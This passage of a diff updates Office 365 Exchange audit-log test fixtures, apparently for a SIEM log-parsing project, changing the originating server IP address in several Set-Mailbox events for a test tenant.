bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"Management\",\"Value\":\"True\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange Migration\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"Migration\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
 },
 "o365audit": {
 "AppId": "",
@@ -1998,7 +1998,7 @@
 "Operation": "Set-Mailbox",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "ProhibitSendReceiveQuota",
@@ -2080,7 +2080,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"ee2a5c48-f068-4672-3e34-08d7adfc0bf4\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": 
"{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"ee2a5c48-f068-4672-3e34-08d7adfc0bf4\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", 
@@ -2092,7 +2092,7 @@
 "Operation": "Set-Mailbox",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "RecoverableItemsQuota",
@@ -2166,7 +2166,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"d3533d4d-f62f-4731-d0c9-08d7adfc0c7b\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": 
"{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"d3533d4d-f62f-4731-d0c9-08d7adfc0c7b\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", 
@@ -2178,7 +2178,7 @@
 "Operation": "Set-Mailbox",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "RecoverableItemsQuota",
@@ -2252,7 +2252,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:20\",\"ExternalAccess\":true,\"Id\":\"b9f4dff2-c7f5-41eb-eae8-08d7ac0f3492\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": 
"{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:20\",\"ExternalAccess\":true,\"Id\":\"b9f4dff2-c7f5-41eb-eae8-08d7ac0f3492\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", 
@@ -2264,7 +2264,7 @@
 "Operation": "Set-Mailbox",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "RecoverableItemsQuota",
@@ -2338,7 +2338,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:08\",\"ExternalAccess\":true,\"Id\":\"bc03d223-966c-4e33-6cf7-08d7ac0f2d88\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": 
"{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:08\",\"ExternalAccess\":true,\"Id\":\"bc03d223-966c-4e33-6cf7-08d7ac0f2d88\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", 
@@ -2350,7 +2350,7 @@
 "Operation": "Set-Mailbox",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "RecoverableItemsQuota",
@@ -2424,7 +2424,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:20\",\"ExternalAccess\":true,\"Id\":\"b9f4dff2-c7f5-41eb-eae8-08d7ac0f3492\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": 
"{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:20\",\"ExternalAccess\":true,\"Id\":\"b9f4dff2-c7f5-41eb-eae8-08d7ac0f3492\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", 
@@ -2436,7 +2436,7 @@
 "Operation": "Set-Mailbox",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "RecoverableItemsQuota",
@@ -2510,7 +2510,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:09\",\"ExternalAccess\":true,\"Id\":\"7a500a7f-cc56-4dfd-d740-08d7ac0f2e45\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 